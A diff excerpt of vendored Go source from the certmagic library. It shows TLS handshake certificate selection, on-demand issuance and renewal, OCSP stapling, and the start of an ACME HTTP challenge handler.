||||
cert, matched = cfg.selectCert(hello, candidate)
|
||||
if matched {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// otherwise, we're bingo on ammo; see issues
|
||||
// caddyserver/caddy#2035 and caddyserver/caddy#1303 (any
|
||||
// change to certificate matching behavior must
|
||||
// account for hosts defined where the hostname
|
||||
// is empty or a catch-all, like ":443" or
|
||||
// "0.0.0.0:443")
|
||||
|
||||
return
|
||||
}
|
||||
|
||||
// selectCert uses hello to select a certificate from the
|
||||
// cache for name. If cfg.CertSelection is set, it will be
|
||||
// used to make the decision. Otherwise, the first matching
|
||||
// unexpired cert is returned. As a special case, if no
|
||||
// certificates match name and cfg.CertSelection is set,
|
||||
// then all certificates in the cache will be passed in
|
||||
// for the cfg.CertSelection to make the final decision.
|
||||
func (cfg *Config) selectCert(hello *tls.ClientHelloInfo, name string) (Certificate, bool) {
|
||||
logger := loggerNamed(cfg.Logger, "handshake")
|
||||
choices := cfg.certCache.getAllMatchingCerts(name)
|
||||
if len(choices) == 0 {
|
||||
if cfg.CertSelection == nil {
|
||||
if logger != nil {
|
||||
logger.Debug("no matching certificates and no custom selection logic", zap.String("identifier", name))
|
||||
}
|
||||
return Certificate{}, false
|
||||
}
|
||||
if logger != nil {
|
||||
logger.Debug("no matching certificate; will choose from all certificates", zap.String("identifier", name))
|
||||
}
|
||||
choices = cfg.certCache.getAllCerts()
|
||||
}
|
||||
if logger != nil {
|
||||
logger.Debug("choosing certificate",
|
||||
zap.String("identifier", name),
|
||||
zap.Int("num_choices", len(choices)))
|
||||
}
|
||||
if cfg.CertSelection == nil {
|
||||
cert, err := DefaultCertificateSelector(hello, choices)
|
||||
if logger != nil {
|
||||
logger.Debug("default certificate selection results",
|
||||
zap.Error(err),
|
||||
zap.String("identifier", name),
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return cert, err == nil
|
||||
}
|
||||
cert, err := cfg.CertSelection.SelectCertificate(hello, choices)
|
||||
if logger != nil {
|
||||
logger.Debug("custom certificate selection results",
|
||||
zap.Error(err),
|
||||
zap.String("identifier", name),
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return cert, err == nil
|
||||
}
|
||||
|
||||
// DefaultCertificateSelector is the default certificate selection logic
|
||||
// given a choice of certificates. If there is at least one certificate in
|
||||
// choices, it always returns a certificate without error. It chooses the
|
||||
// first non-expired certificate that the client supports if possible,
|
||||
// otherwise it returns an expired certificate that the client supports,
|
||||
// otherwise it just returns the first certificate in the list of choices.
|
||||
func DefaultCertificateSelector(hello *tls.ClientHelloInfo, choices []Certificate) (Certificate, error) {
|
||||
if len(choices) == 0 {
|
||||
return Certificate{}, fmt.Errorf("no certificates available")
|
||||
}
|
||||
now := time.Now()
|
||||
best := choices[0]
|
||||
for _, choice := range choices {
|
||||
if err := hello.SupportsCertificate(&choice.Certificate); err != nil {
|
||||
continue
|
||||
}
|
||||
best = choice // at least the client supports it...
|
||||
if now.After(choice.Leaf.NotBefore) && now.Before(choice.Leaf.NotAfter) {
|
||||
return choice, nil // ...and unexpired, great! "Certificate, I choose you!"
|
||||
}
|
||||
}
|
||||
return best, nil // all matching certs are expired or incompatible, oh well
|
||||
}
|
||||
|
||||
// getCertDuringHandshake will get a certificate for hello. It first tries
|
||||
// the in-memory cache. If no exact certificate for hello is in the cache, the
|
||||
// config most closely corresponding to hello (like a wildcard) will be loaded.
|
||||
// If none could be matched from the cache, it invokes the configured certificate
|
||||
// managers to get a certificate and uses the first one that returns a certificate.
|
||||
// If no certificate managers return a value, and if the config allows it
|
||||
// (OnDemand!=nil) and if loadIfNecessary == true, it goes to storage to load the
|
||||
// cert into the cache and serve it. If it's not on disk and if
|
||||
// obtainIfNecessary == true, the certificate will be obtained from the CA, cached,
|
||||
// and served. If obtainIfNecessary == true, then loadIfNecessary must also be == true.
|
||||
// An error will be returned if and only if no certificate is available.
|
||||
//
|
||||
// This function is safe for concurrent use.
|
||||
func (cfg *Config) getCertDuringHandshake(hello *tls.ClientHelloInfo, loadIfNecessary, obtainIfNecessary bool) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "handshake")
|
||||
|
||||
ctx := context.TODO() // TODO: get a proper context? from somewhere...
|
||||
|
||||
// First check our in-memory cache to see if we've already loaded it
|
||||
cert, matched, defaulted := cfg.getCertificateFromCache(hello)
|
||||
if matched {
|
||||
if log != nil {
|
||||
log.Debug("matched certificate in cache",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
if cert.managed && cfg.OnDemand != nil && obtainIfNecessary {
|
||||
// On-demand certificates are maintained in the background, but
|
||||
// maintenance is triggered by handshakes instead of by a timer
|
||||
// as in maintain.go.
|
||||
return cfg.optionalMaintenance(ctx, loggerNamed(cfg.Logger, "on_demand"), cert, hello)
|
||||
}
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// If an external Manager is configured, try to get it from them.
|
||||
// Only continue to use our own logic if it returns empty+nil.
|
||||
externalCert, err := cfg.getCertFromAnyCertManager(ctx, hello, log)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
if !externalCert.Empty() {
|
||||
return externalCert, nil
|
||||
}
|
||||
|
||||
name := cfg.getNameFromClientHello(hello)
|
||||
|
||||
// We might be able to load or obtain a needed certificate. Load from
|
||||
// storage if OnDemand is enabled, or if there is the possibility that
|
||||
// a statically-managed cert was evicted from a full cache.
|
||||
cfg.certCache.mu.RLock()
|
||||
cacheSize := len(cfg.certCache.cache)
|
||||
cfg.certCache.mu.RUnlock()
|
||||
|
||||
// A cert might have still been evicted from the cache even if the cache
|
||||
// is no longer completely full; this happens if the newly-loaded cert is
|
||||
// itself evicted (perhaps due to being expired or unmanaged at this point).
|
||||
// Hence, we use an "almost full" metric to allow for the cache to not be
|
||||
// perfectly full while still being able to load needed certs from storage.
|
||||
// See https://caddy.community/t/error-tls-alert-internal-error-592-again/13272
|
||||
// and caddyserver/caddy#4320.
|
||||
cacheCapacity := float64(cfg.certCache.options.Capacity)
|
||||
cacheAlmostFull := cacheCapacity > 0 && float64(cacheSize) >= cacheCapacity*.9
|
||||
loadDynamically := cfg.OnDemand != nil || cacheAlmostFull
|
||||
|
||||
if loadDynamically && loadIfNecessary {
|
||||
// Then check to see if we have one on disk
|
||||
// TODO: As suggested here, https://caddy.community/t/error-tls-alert-internal-error-592-again/13272/30?u=matt,
|
||||
// it might be a good idea to check with the DecisionFunc or allowlist first before even loading the certificate
|
||||
// from storage, since if we can't renew it, why should we even try serving it (it will just get evicted after
|
||||
// we get a return value of false anyway)? See issue #174
|
||||
loadedCert, err := cfg.CacheManagedCertificate(ctx, name)
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
// If no exact match, try a wildcard variant, which is something we can still use
|
||||
labels := strings.Split(name, ".")
|
||||
labels[0] = "*"
|
||||
loadedCert, err = cfg.CacheManagedCertificate(ctx, strings.Join(labels, "."))
|
||||
}
|
||||
if err == nil {
|
||||
if log != nil {
|
||||
log.Debug("loaded certificate from storage",
|
||||
zap.Strings("subjects", loadedCert.Names),
|
||||
zap.Bool("managed", loadedCert.managed),
|
||||
zap.Time("expiration", loadedCert.Leaf.NotAfter),
|
||||
zap.String("hash", loadedCert.hash))
|
||||
}
|
||||
loadedCert, err = cfg.handshakeMaintenance(ctx, hello, loadedCert)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("maintaining newly-loaded certificate",
|
||||
zap.String("server_name", name),
|
||||
zap.Error(err))
|
||||
}
|
||||
}
|
||||
return loadedCert, nil
|
||||
}
|
||||
if cfg.OnDemand != nil && obtainIfNecessary {
|
||||
// By this point, we need to ask the CA for a certificate
|
||||
return cfg.obtainOnDemandCertificate(ctx, hello)
|
||||
}
|
||||
}
|
||||
|
||||
// Fall back to the default certificate if there is one
|
||||
if defaulted {
|
||||
if log != nil {
|
||||
log.Debug("fell back to default certificate",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Debug("no certificate matching TLS ClientHello",
|
||||
zap.String("server_name", hello.ServerName),
|
||||
zap.String("remote", hello.Conn.RemoteAddr().String()),
|
||||
zap.String("identifier", name),
|
||||
zap.Uint16s("cipher_suites", hello.CipherSuites),
|
||||
zap.Float64("cert_cache_fill", float64(cacheSize)/cacheCapacity), // may be approximate! because we are not within the lock
|
||||
zap.Bool("load_if_necessary", loadIfNecessary),
|
||||
zap.Bool("obtain_if_necessary", obtainIfNecessary),
|
||||
zap.Bool("on_demand", cfg.OnDemand != nil))
|
||||
}
|
||||
|
||||
return Certificate{}, fmt.Errorf("no certificate available for '%s'", name)
|
||||
}
|
||||
|
||||
// optionalMaintenance will perform maintenance on the certificate (if necessary) and
|
||||
// will return the resulting certificate. This should only be done if the certificate
|
||||
// is managed, OnDemand is enabled, and the scope is allowed to obtain certificates.
|
||||
func (cfg *Config) optionalMaintenance(ctx context.Context, log *zap.Logger, cert Certificate, hello *tls.ClientHelloInfo) (Certificate, error) {
|
||||
newCert, err := cfg.handshakeMaintenance(ctx, hello, cert)
|
||||
if err == nil {
|
||||
return newCert, nil
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Error("renewing certificate on-demand failed",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("not_after", cert.Leaf.NotAfter),
|
||||
zap.Error(err))
|
||||
}
|
||||
|
||||
if cert.Expired() {
|
||||
return cert, err
|
||||
}
|
||||
|
||||
// still has time remaining, so serve it anyway
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// checkIfCertShouldBeObtained checks to see if an on-demand TLS certificate
|
||||
// should be obtained for a given domain based upon the config settings. If
|
||||
// a non-nil error is returned, do not issue a new certificate for name.
|
||||
func (cfg *Config) checkIfCertShouldBeObtained(name string) error {
|
||||
if cfg.OnDemand == nil {
|
||||
return fmt.Errorf("not configured for on-demand certificate issuance")
|
||||
}
|
||||
if !SubjectQualifiesForCert(name) {
|
||||
return fmt.Errorf("subject name does not qualify for certificate: %s", name)
|
||||
}
|
||||
if cfg.OnDemand.DecisionFunc != nil {
|
||||
return cfg.OnDemand.DecisionFunc(name)
|
||||
}
|
||||
if len(cfg.OnDemand.hostWhitelist) > 0 &&
|
||||
!cfg.OnDemand.whitelistContains(name) {
|
||||
return fmt.Errorf("certificate for '%s' is not managed", name)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// obtainOnDemandCertificate obtains a certificate for hello.
|
||||
// If another goroutine has already started obtaining a cert for
|
||||
// hello, it will wait and use what the other goroutine obtained.
|
||||
//
|
||||
// This function is safe for use by multiple concurrent goroutines.
|
||||
func (cfg *Config) obtainOnDemandCertificate(ctx context.Context, hello *tls.ClientHelloInfo) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "on_demand")
|
||||
|
||||
name := cfg.getNameFromClientHello(hello)
|
||||
|
||||
getCertWithoutReobtaining := func() (Certificate, error) {
|
||||
// very important to set the obtainIfNecessary argument to false, so we don't repeat this infinitely
|
||||
return cfg.getCertDuringHandshake(hello, true, false)
|
||||
}
|
||||
|
||||
// We must protect this process from happening concurrently, so synchronize.
|
||||
obtainCertWaitChansMu.Lock()
|
||||
wait, ok := obtainCertWaitChans[name]
|
||||
if ok {
|
||||
// lucky us -- another goroutine is already obtaining the certificate.
|
||||
// wait for it to finish obtaining the cert and then we'll use it.
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
// TODO: see if we can get a proper context in here, for true cancellation
|
||||
timeout := time.NewTimer(2 * time.Minute)
|
||||
select {
|
||||
case <-timeout.C:
|
||||
return Certificate{}, fmt.Errorf("timed out waiting to obtain certificate for %s", name)
|
||||
case <-wait:
|
||||
timeout.Stop()
|
||||
}
|
||||
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// looks like it's up to us to do all the work and obtain the cert.
|
||||
// make a chan others can wait on if needed
|
||||
wait = make(chan struct{})
|
||||
obtainCertWaitChans[name] = wait
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
unblockWaiters := func() {
|
||||
obtainCertWaitChansMu.Lock()
|
||||
close(wait)
|
||||
delete(obtainCertWaitChans, name)
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
}
|
||||
|
||||
// Make sure the certificate should be obtained based on config
|
||||
err := cfg.checkIfCertShouldBeObtained(name)
|
||||
if err != nil {
|
||||
unblockWaiters()
|
||||
return Certificate{}, err
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Info("obtaining new certificate", zap.String("server_name", name))
|
||||
}
|
||||
|
||||
// TODO: we are only adding a timeout because we don't know if the context passed in is actually cancelable...
|
||||
// (timeout duration is based on https://caddy.community/t/zerossl-dns-challenge-failing-often-route53-plugin/13822/24?u=matt)
|
||||
var cancel context.CancelFunc
|
||||
ctx, cancel = context.WithTimeout(ctx, 180*time.Second)
|
||||
defer cancel()
|
||||
|
||||
// Obtain the certificate
|
||||
err = cfg.ObtainCertAsync(ctx, name)
|
||||
|
||||
// immediately unblock anyone waiting for it; doing this in
|
||||
// a defer would risk deadlock because of the recursive call
|
||||
// to getCertDuringHandshake below when we return!
|
||||
unblockWaiters()
|
||||
|
||||
if err != nil {
|
||||
// shucks; failed to solve challenge on-demand
|
||||
return Certificate{}, err
|
||||
}
|
||||
|
||||
// success; certificate was just placed on disk, so
|
||||
// we need only restart serving the certificate
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// handshakeMaintenance performs a check on cert for expiration and OCSP validity.
|
||||
// If necessary, it will renew the certificate and/or refresh the OCSP staple.
|
||||
// OCSP stapling errors are not returned, only logged.
|
||||
//
|
||||
// This function is safe for use by multiple concurrent goroutines.
|
||||
func (cfg *Config) handshakeMaintenance(ctx context.Context, hello *tls.ClientHelloInfo, cert Certificate) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "on_demand")
|
||||
|
||||
// Check OCSP staple validity
|
||||
if cert.ocsp != nil && !freshOCSP(cert.ocsp) {
|
||||
if log != nil {
|
||||
log.Debug("OCSP response needs refreshing",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Int("ocsp_status", cert.ocsp.Status),
|
||||
zap.Time("this_update", cert.ocsp.ThisUpdate),
|
||||
zap.Time("next_update", cert.ocsp.NextUpdate))
|
||||
}
|
||||
|
||||
err := stapleOCSP(ctx, cfg.OCSP, cfg.Storage, &cert, nil)
|
||||
if err != nil {
|
||||
// An error with OCSP stapling is not the end of the world, and in fact, is
|
||||
// quite common considering not all certs have issuer URLs that support it.
|
||||
if log != nil {
|
||||
log.Warn("stapling OCSP",
|
||||
zap.String("server_name", hello.ServerName),
|
||||
zap.Error(err))
|
||||
}
|
||||
} else if log != nil {
|
||||
if log != nil {
|
||||
log.Debug("successfully stapled new OCSP response",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Int("ocsp_status", cert.ocsp.Status),
|
||||
zap.Time("this_update", cert.ocsp.ThisUpdate),
|
||||
zap.Time("next_update", cert.ocsp.NextUpdate))
|
||||
}
|
||||
}
|
||||
|
||||
// our copy of cert has the new OCSP staple, so replace it in the cache
|
||||
cfg.certCache.mu.Lock()
|
||||
cfg.certCache.cache[cert.hash] = cert
|
||||
cfg.certCache.mu.Unlock()
|
||||
}
|
||||
|
||||
// We attempt to replace any certificates that were revoked.
|
||||
// Crucially, this happens OUTSIDE a lock on the certCache.
|
||||
if certShouldBeForceRenewed(cert) {
|
||||
if log != nil {
|
||||
log.Warn("on-demand certificate's OCSP status is REVOKED; will try to forcefully renew",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Int("ocsp_status", cert.ocsp.Status),
|
||||
zap.Time("revoked_at", cert.ocsp.RevokedAt),
|
||||
zap.Time("this_update", cert.ocsp.ThisUpdate),
|
||||
zap.Time("next_update", cert.ocsp.NextUpdate))
|
||||
}
|
||||
return cfg.renewDynamicCertificate(ctx, hello, cert)
|
||||
}
|
||||
|
||||
// Check cert expiration
|
||||
if currentlyInRenewalWindow(cert.Leaf.NotBefore, cert.Leaf.NotAfter, cfg.RenewalWindowRatio) {
|
||||
return cfg.renewDynamicCertificate(ctx, hello, cert)
|
||||
}
|
||||
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// renewDynamicCertificate renews the certificate for name using cfg. It returns the
|
||||
// certificate to use and an error, if any. name should already be lower-cased before
|
||||
// calling this function. name is the name obtained directly from the handshake's
|
||||
// ClientHello. If the certificate hasn't yet expired, currentCert will be returned
|
||||
// and the renewal will happen in the background; otherwise this blocks until the
|
||||
// certificate has been renewed, and returns the renewed certificate.
|
||||
//
|
||||
// If the certificate's OCSP status (currentCert.ocsp) is Revoked, it will be forcefully
|
||||
// renewed even if it is not expiring.
|
||||
//
|
||||
// This function is safe for use by multiple concurrent goroutines.
|
||||
func (cfg *Config) renewDynamicCertificate(ctx context.Context, hello *tls.ClientHelloInfo, currentCert Certificate) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "on_demand")
|
||||
|
||||
name := cfg.getNameFromClientHello(hello)
|
||||
timeLeft := time.Until(currentCert.Leaf.NotAfter)
|
||||
revoked := currentCert.ocsp != nil && currentCert.ocsp.Status == ocsp.Revoked
|
||||
|
||||
getCertWithoutReobtaining := func() (Certificate, error) {
|
||||
// very important to set the obtainIfNecessary argument to false, so we don't repeat this infinitely
|
||||
return cfg.getCertDuringHandshake(hello, true, false)
|
||||
}
|
||||
|
||||
// see if another goroutine is already working on this certificate
|
||||
obtainCertWaitChansMu.Lock()
|
||||
wait, ok := obtainCertWaitChans[name]
|
||||
if ok {
|
||||
// lucky us -- another goroutine is already renewing the certificate
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
// the current certificate hasn't expired, and another goroutine is already
|
||||
// renewing it, so we might as well serve what we have without blocking, UNLESS
|
||||
// we're forcing renewal, in which case the current certificate is not usable
|
||||
if timeLeft > 0 && !revoked {
|
||||
if log != nil {
|
||||
log.Debug("certificate expires soon but is already being renewed; serving current certificate",
|
||||
zap.Strings("subjects", currentCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
return currentCert, nil
|
||||
}
|
||||
|
||||
// otherwise, we'll have to wait for the renewal to finish so we don't serve
|
||||
// a revoked or expired certificate
|
||||
|
||||
if log != nil {
|
||||
log.Debug("certificate has expired, but is already being renewed; waiting for renewal to complete",
|
||||
zap.Strings("subjects", currentCert.Names),
|
||||
zap.Time("expired", currentCert.Leaf.NotAfter),
|
||||
zap.Bool("revoked", revoked))
|
||||
}
|
||||
|
||||
// TODO: see if we can get a proper context in here, for true cancellation
|
||||
timeout := time.NewTimer(2 * time.Minute)
|
||||
select {
|
||||
case <-timeout.C:
|
||||
return Certificate{}, fmt.Errorf("timed out waiting for certificate renewal of %s", name)
|
||||
case <-wait:
|
||||
timeout.Stop()
|
||||
}
|
||||
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// looks like it's up to us to do all the work and renew the cert
|
||||
wait = make(chan struct{})
|
||||
obtainCertWaitChans[name] = wait
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
unblockWaiters := func() {
|
||||
obtainCertWaitChansMu.Lock()
|
||||
close(wait)
|
||||
delete(obtainCertWaitChans, name)
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Info("attempting certificate renewal",
|
||||
zap.String("server_name", name),
|
||||
zap.Strings("subjects", currentCert.Names),
|
||||
zap.Time("expiration", currentCert.Leaf.NotAfter),
|
||||
zap.Duration("remaining", timeLeft),
|
||||
zap.Bool("revoked", revoked))
|
||||
}
|
||||
|
||||
// Make sure a certificate for this name should be obtained on-demand
|
||||
err := cfg.checkIfCertShouldBeObtained(name)
|
||||
if err != nil {
|
||||
// if not, remove from cache (it will be deleted from storage later)
|
||||
cfg.certCache.mu.Lock()
|
||||
cfg.certCache.removeCertificate(currentCert)
|
||||
cfg.certCache.mu.Unlock()
|
||||
unblockWaiters()
|
||||
return Certificate{}, err
|
||||
}
|
||||
|
||||
// Renew and reload the certificate
|
||||
renewAndReload := func(ctx context.Context, cancel context.CancelFunc) (Certificate, error) {
|
||||
defer cancel()
|
||||
|
||||
// otherwise, renew with issuer, etc.
|
||||
var newCert Certificate
|
||||
if revoked {
|
||||
newCert, err = cfg.forceRenew(ctx, log, currentCert)
|
||||
} else {
|
||||
err = cfg.RenewCertAsync(ctx, name, false)
|
||||
if err == nil {
|
||||
// even though the recursive nature of the dynamic cert loading
|
||||
// would just call this function anyway, we do it here to
|
||||
// make the replacement as atomic as possible.
|
||||
newCert, err = cfg.CacheManagedCertificate(ctx, name)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("loading renewed certificate", zap.String("server_name", name), zap.Error(err))
|
||||
}
|
||||
} else {
|
||||
// replace the old certificate with the new one
|
||||
cfg.certCache.replaceCertificate(currentCert, newCert)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// immediately unblock anyone waiting for it; doing this in
|
||||
// a defer would risk deadlock because of the recursive call
|
||||
// to getCertDuringHandshake below when we return!
|
||||
unblockWaiters()
|
||||
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("renewing and reloading certificate",
|
||||
zap.String("server_name", name),
|
||||
zap.Error(err),
|
||||
zap.Bool("forced", revoked))
|
||||
}
|
||||
return newCert, err
|
||||
}
|
||||
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// if the certificate hasn't expired, we can serve what we have and renew in the background
|
||||
if timeLeft > 0 {
|
||||
ctx, cancel := context.WithTimeout(ctx, 5*time.Minute)
|
||||
go renewAndReload(ctx, cancel)
|
||||
return currentCert, nil
|
||||
}
|
||||
|
||||
// otherwise, we have to block while we renew an expired certificate
|
||||
ctx, cancel := context.WithTimeout(ctx, 90*time.Second)
|
||||
return renewAndReload(ctx, cancel)
|
||||
}
|
||||
|
||||
// getCertFromAnyCertManager gets a certificate from cfg's Managers. If there are no Managers defined, this is
|
||||
// a no-op that returns empty values. Otherwise, it gets a certificate for hello from the first Manager that
|
||||
// returns a certificate and no error.
|
||||
func (cfg *Config) getCertFromAnyCertManager(ctx context.Context, hello *tls.ClientHelloInfo, log *zap.Logger) (Certificate, error) {
|
||||
// fast path if nothing to do
|
||||
if len(cfg.Managers) == 0 {
|
||||
return Certificate{}, nil
|
||||
}
|
||||
|
||||
var upstreamCert *tls.Certificate
|
||||
|
||||
// try all the GetCertificate methods on external managers; use first one that returns a certificate
|
||||
for i, certManager := range cfg.Managers {
|
||||
var err error
|
||||
upstreamCert, err = certManager.GetCertificate(ctx, hello)
|
||||
if err != nil {
|
||||
log.Error("getting certificate from external certificate manager",
|
||||
zap.String("sni", hello.ServerName),
|
||||
zap.Int("cert_manager", i),
|
||||
zap.Error(err))
|
||||
continue
|
||||
}
|
||||
if upstreamCert != nil {
|
||||
break
|
||||
}
|
||||
}
|
||||
if upstreamCert == nil {
|
||||
if log != nil {
|
||||
log.Debug("all external certificate managers yielded no certificates and no errors", zap.String("sni", hello.ServerName))
|
||||
}
|
||||
return Certificate{}, nil
|
||||
}
|
||||
|
||||
var cert Certificate
|
||||
err := fillCertFromLeaf(&cert, *upstreamCert)
|
||||
if err != nil {
|
||||
return Certificate{}, fmt.Errorf("external certificate manager: %s: filling cert from leaf: %v", hello.ServerName, err)
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Debug("using externally-managed certificate",
|
||||
zap.String("sni", hello.ServerName),
|
||||
zap.Strings("names", cert.Names),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter))
|
||||
}
|
||||
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// getTLSALPNChallengeCert is to be called when the clientHello pertains to
|
||||
// a TLS-ALPN challenge and a certificate is required to solve it. This method gets
|
||||
// the relevant challenge info and then returns the associated certificate (if any)
|
||||
// or generates it anew if it's not available (as is the case when distributed
|
||||
// solving). True is returned if the challenge is being solved distributed (there
|
||||
// is no semantic difference with distributed solving; it is mainly for logging).
|
||||
func (cfg *Config) getTLSALPNChallengeCert(clientHello *tls.ClientHelloInfo) (*tls.Certificate, bool, error) {
|
||||
chalData, distributed, err := cfg.getChallengeInfo(clientHello.Context(), clientHello.ServerName)
|
||||
if err != nil {
|
||||
return nil, distributed, err
|
||||
}
|
||||
|
||||
// fast path: we already created the certificate (this avoids having to re-create
|
||||
// it at every handshake that tries to verify, e.g. multi-perspective validation)
|
||||
if chalData.data != nil {
|
||||
return chalData.data.(*tls.Certificate), distributed, nil
|
||||
}
|
||||
|
||||
// otherwise, we can re-create the solution certificate, but it takes a few cycles
|
||||
cert, err := acmez.TLSALPN01ChallengeCert(chalData.Challenge)
|
||||
if err != nil {
|
||||
return nil, distributed, fmt.Errorf("making TLS-ALPN challenge certificate: %v", err)
|
||||
}
|
||||
if cert == nil {
|
||||
return nil, distributed, fmt.Errorf("got nil TLS-ALPN challenge certificate but no error")
|
||||
}
|
||||
|
||||
return cert, distributed, nil
|
||||
}
|
||||
|
||||
// getNameFromClientHello returns a normalized form of hello.ServerName.
|
||||
// If hello.ServerName is empty (i.e. client did not use SNI), then the
|
||||
// associated connection's local address is used to extract an IP address.
|
||||
func (*Config) getNameFromClientHello(hello *tls.ClientHelloInfo) string {
|
||||
if name := normalizedName(hello.ServerName); name != "" {
|
||||
return name
|
||||
}
|
||||
return localIPFromConn(hello.Conn)
|
||||
}
|
||||
|
||||
// localIPFromConn returns the host portion of c's local address
|
||||
// and strips the scope ID if one exists (see RFC 4007).
|
||||
func localIPFromConn(c net.Conn) string {
|
||||
if c == nil {
|
||||
return ""
|
||||
}
|
||||
localAddr := c.LocalAddr().String()
|
||||
ip, _, err := net.SplitHostPort(localAddr)
|
||||
if err != nil {
|
||||
// OK; assume there was no port
|
||||
ip = localAddr
|
||||
}
|
||||
// IPv6 addresses can have scope IDs, e.g. "fe80::4c3:3cff:fe4f:7e0b%eth0",
|
||||
// but for our purposes, these are useless (unless a valid use case proves
|
||||
// otherwise; see issue #3911)
|
||||
if scopeIDStart := strings.Index(ip, "%"); scopeIDStart > -1 {
|
||||
ip = ip[:scopeIDStart]
|
||||
}
|
||||
return ip
|
||||
}
|
||||
|
||||
// normalizedName returns a cleaned form of serverName that is
|
||||
// used for consistency when referring to a SNI value.
|
||||
func normalizedName(serverName string) string {
|
||||
return strings.ToLower(strings.TrimSpace(serverName))
|
||||
}
|
||||
|
||||
// obtainCertWaitChans is used to coordinate obtaining certs for each hostname.
|
||||
var obtainCertWaitChans = make(map[string]chan struct{})
|
||||
var obtainCertWaitChansMu sync.Mutex
|
124
vendor/github.com/caddyserver/certmagic/httphandler.go
generated
vendored
Normal file
124
vendor/github.com/caddyserver/certmagic/httphandler.go
generated
vendored
Normal file
@ -0,0 +1,124 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"strings"
|
||||
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// HTTPChallengeHandler wraps h in a handler that can solve the ACME
|
||||
// HTTP challenge. cfg is required, and it must have a certificate
|
||||
// cache backed by a functional storage facility, since that is where
|
||||
// the challenge state is stored between initiation and solution.
|
||||
//
|
||||
// If a request is not an ACME HTTP challenge, h will be invoked.
|
||||
func (am *ACMEIssuer) HTTPChallengeHandler(h http.Handler) http.Handler {
|
||||
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if am.HandleHTTPChallenge(w, r) {
|
||||
return
|
||||
}
|
||||
h.ServeHTTP(w, r)
|
||||
})
|
||||
}
|
||||
|
||||
// HandleHTTPChallenge uses am to solve challenge requests from an ACME
|
||||
// server that were initiated by this instance or any other instance in
|
||||
// this cluster (being, any instances using the same storage am does).
|
||||
//
|
||||
// If the HTTP challenge is disabled, this function is a no-op.
|
||||
//
|
||||
// If am is nil or if am does not have a certificate cache backed by
|
||||
// usable storage, solving the HTTP challenge will fail.
|
||||
//
|
||||
// It returns true if it handled the request; if so, the response has
|
||||
// already been written. If false is returned, this call was a no-op and
|
||||
// the request has not been handled.
|
||||
func (am *ACMEIssuer) HandleHTTPChallenge(w http.ResponseWriter, r *http.Request) bool {
|
||||
if am == nil {
|
||||
return false
|
||||
}
|
||||
if am.DisableHTTPChallenge {
|
||||
return false
|
||||
}
|
||||
if !LooksLikeHTTPChallenge(r) {
|
||||
return false
|
||||
}
|
||||
return am.distributedHTTPChallengeSolver(w, r)
|
||||
}
|
||||
|
||||
